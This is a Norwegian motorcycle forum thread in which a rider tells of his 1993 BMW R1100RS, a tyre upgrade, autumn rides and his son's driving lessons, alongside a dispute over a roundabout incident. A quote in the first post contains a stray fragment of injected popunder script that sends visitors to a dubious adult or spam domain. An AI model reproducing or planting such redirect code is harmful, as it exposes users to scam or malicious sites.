Gammelferskingens eskapader med Bimbo.

Din egen Forum-blogg! Om MC-livet ditt og annet du vil dele med andre.
Lauri
Innlegg: 416
Registrert: 22 des 2011, 15:05
Motorsykkelen din: To Yama, to Kawa, Ural, Flakmop, Aprilia

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av Lauri »

SveinHa skrev: 27 jun 2023, 11:09 Jæv£a BMW-folk... :lol
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Motorsyklisten har aaaaltfor stor fart inn i rundkjøringen. At føreren av BMW-stasjonsvogna driter seg ut er klokkeklart (overholder ikke vikeplikten) - men skal vi gjette på at bilføreren ikke så motorsyklisten pga dennes fart 👍

Litt gubbetendenser hos motorsyklisten: Tute - for hva da? Leke pol’ti? Tute gjør vi for å avverge/varsle om fare. Å ligge bak og tute er tøv!
Jeg visste det var smørenippel på bremsecalipperet!

Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av SveinHa »

Gå og smør bremsecaliperen din du @Lauri ... så skal jeg se om jeg finner noen å bruke fløyta på for andre gang i verdenshistorien imens...
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Lauri
Innlegg: 416
Registrert: 22 des 2011, 15:05
Motorsykkelen din: To Yama, to Kawa, Ural, Flakmop, Aprilia

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av Lauri »

[ :thumleft quote=SveinHa post_id=428403 time=1688764891 user_id=9125]
Gå og smør bremsecaliperen din du @Lauri ... så skal jeg se om jeg finner noen å bruke fløyta på for andre gang i verdenshistorien imens...
[/quote]

:twothumbs: du tenker sikkert på den fettnippelen, som jeg tenker på…

Bare fortsett å fløyt du (hvis det var du som var motorsyklisten?).
Jeg visste det var smørenippel på bremsecalipperet!

Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av SveinHa »

Har vært litt stille i denne tråden men jeg prøver å heller skrive litt mindre og med mer innhold enn å "føre dagbok"...

Har jo slitt en del med håndteringen av Bimbo gjennom svinger. Når sykkelen ligger sånn passe på skrå så vil styret svinge betydelig mer og jeg måtte bruke en del krefter for å motvirke det. Forrige uke kjøpte jeg et Metzeler Roadtec 01 SE og etter første prøvetur i dag og kan jeg konkludere med at jeg har fått meg "ny" sykkel. Dette var en heeeelt annen verden enn det gamle (som skulle være nesten nytt iflg. selger) Bridgestone Battlax Sport Touring. Nå slipper jeg å kjempe med styret gjennom svingene og kan til og med styre ved å flytte kroppsvekten. Grandios forbedring :twothumbs:

Poden hadde sin første kjøretime på kjøreskole i forrige uke. Dobbelttime i hovedsak på bane. Må få skryte litt av han: Kjørelæreren sa at han aldri hadde hatt en elev som hadde tatt alle øvelsene så raskt :twothumbs: Det er vel betalingen for bortimot 400 mil med "L" på ryggen siden 1. juni i tillegg til at han har kjørt motorsykkel noen år siden før han var 6 år (trial).
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av SveinHa »

Med sesongen litt på hell... nåja, her på mine kanter av landet kan der jo være mc-sesong hele vinteren en gang i blant, og med værmeldinger som krangler om sol og overskyet oppholdsvær med 17 grd.C ble det en kosetur i dag ... Hadde oppholdsvær første og siste km og ellers regn, tildels ganske tungt sådan, så turen ble ikke helt som tenkt...
Screenshot_20230921-124420.png
Fin og variert tur med alle typer asfaltvei fra nesten motorvei til smal og svingete bratt vei over fjellet
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Brukeravatar
rolf-arne
Innlegg: 2137
Registrert: 20 aug 2018, 20:28
Motorsykkelen din: Pan European 1100 -1995, CBX 1000
Sted: Nordvågen,Nordkapp
Kontakt:

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av rolf-arne »

Sesongen begynner å komme litt på hell her jeg bor også,, ser ut som om jeg er den eneste som har sykkel i drift - , ser bort fra mopedungdommen.

Når det gjelder den rundtkjøringa så er vel uoppmerksomhet fra begge hold , kjennetegnet.

Hadde det vært jeg som hadde sånn fart på MC - så hadde jeg også vært innerst og forbi dem BMWen... med rolig kjøring så hadde man ganske enkelt sleept den inn... fløyte er bare tull - når en klarer å kvele sykkelen.
Nyskjærrig - lurer på hva som er bak neste sving - når det er fastslått - så blir man rastlaus og lurer på hva som er bak den neste -- å sånn går livet - av og til tar nyskjærrigheta pause og da kan man avspore ei stund - til å bli kjent med folk og gjøre betjentskaper om til vennskap -- og ikke minst kan kroppen ha sine gode stunder og da gjelder det å enten nyte livet eller få noe gjort. Det siste skyves det ofte på, skal man være ærlig..

Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av SveinHa »

rolf-arne skrev: 21 sep 2023, 17:48Hadde det vært jeg som hadde sånn fart på MC - så hadde jeg også vært innerst og forbi dem BMWen...
Jeg vil ikke kalle 40 km/t inn i rundkjøring i 60 sone for spesielt fort men jeg ser jo flere her tydeligvis mener det... Akkurat kvelingen var nå litt pinlig men det får nå være så... Jeg var da også 4 sekund inne i den tomme rundkjøringen før bilen entret så han hadde tydeligvis fokus en heeeeelt annen plass...
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av SveinHa »

SveinHa skrev: 27 jun 2023, 11:09 Jæv£a BMW-folk... :lol
Jeg hadde egentlig ikke tenkt å kommentere det men siden der stadig dukker opp nye småstikk 3 mnd senere så...

Ingen merket eller kommenterte ironien ved at jeg selv kjører BMW...

Ingen merket eller kommenterte at jeg avklarte situasjonen ved å bremse og DERETTER fløytet og kvelte sykkelen fordi jeg ikke var obs på hvilket gir jeg hadde den i...

Det er merkelig med nettsamfunn. Du kan velge å være hvem som helst siden ingen eller få vet hvem du virkelig er og så velger de fleste å være i overkant usympatiske... Jaja, jeg både tror og håper at dere er litt mer folkelige i det virkelige liv...

Jeg tenker spesielt på en kar jeg har fulgt på flere fora (ikke mcsiden.no så vidt jeg vet) i rundt 20 år og han irriterer på seg alle med sin i overkant arrogante besservisser oppførsel, får beskjed om å skjerpe seg, men han bare fortsetter og skryter i tillegg av at han ble kastet ut av et forum (bl.a. av undertegnede) på grunn av sin oppførsel for et par perioder... Men i det virkelige liv er han veldig både trivelig, saklig og ikke minst kunnskapsrik. Jeg har ikke møtt han personlig men kjenner folk som har det, jeg har bare snakket med han i telefonen et par timer...

Folk e løgne... :P ...eller som min halvt engelske kjæreste sier det: "The more I see people, the more I love my dog...".
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av SveinHa »

Ser ut til at sesongen er på hell. Hadde nettopp en tur på 2x6 mil for å hente poden hos sine jentevenner. Våte veier og litt småyr som la seg på vindskjermen på sykkelen men viste ikke i det hele tatt på visiret som var nybehandlet med en Rain-X kloning jeg har. Ikke en eneste annen sykkel å se...

Regner med vinteren er et stykke unna enda... Det hender jo en sjelden gang i blant at vi ikke har snø i det hele tatt hele vinteren her på mine trakter... Har blitt 600 mil så langt denne sesongen og det er bare småturer, sånn omtrent max 12-15 mil...
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av SveinHa »

Være inne i by'n og levert poden til sin andre A1 dobbelttime. Varierende vær, godt med vind og 12-13 grader... men stort sett ganske fint :D
Skjermbilde fra 2023-10-11 14-58-41.png
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av SveinHa »

Kjørelærer godt fornøyd med poden. Fokus på plassering i vegbanen, speil og blindsoner og fart inn i kryss/rundkjøringer. Ikke flere kjøretimer før de starter etter vinteren i uke 9. Får tatt unna teoriprøven i løpet av vinteren.
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av SveinHa »

En siste kosetur før knallerten til poden avregistreres for vinteren.
Screenshot_20231029-173417.png
...eller, dvs. der blir nok en "L" tur til skolen i morgen også først men det er jo mer nyttetur...
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av SveinHa »

En liten tur på 8.6 mil i 4 grader ble litt mer Coldfinger enn Goldfinger selv med Thinsulate hansker og varmeholker...
IMG_20231111_123059_642.jpg
Av 2-hjulinger så jeg bare 1 moped og 1 MC...

Fint vær men mindre sol enn meldt.
Screenshot_20231111-133151.png
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Brukeravatar
Gammelsmurfen
Innlegg: 1297
Registrert: 09 nov 2020, 19:05
Motorsykkelen din: BMW F850GS Rally 2022

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av Gammelsmurfen »

4 grader går greit en stund, men i lengden så kryper den inn sakte men sikkert.
For min del merker jeg det best da jeg kommer inn i varmen, at man har blitt noe gjennomkald så det tar litt tid å få igjen varmen i kroppen.

Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av SveinHa »

Det var egentlig verst på første halvdelen av turen selv om tempen ikke steg nevneverdig underveis. Der var meldt både sol på formiddagen og regn på ettermiddagen men begge deler uteble for det meste. Fin tur... Fyrte i peisen da jeg kom hjem men det var mest for kosen sin del...
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Svar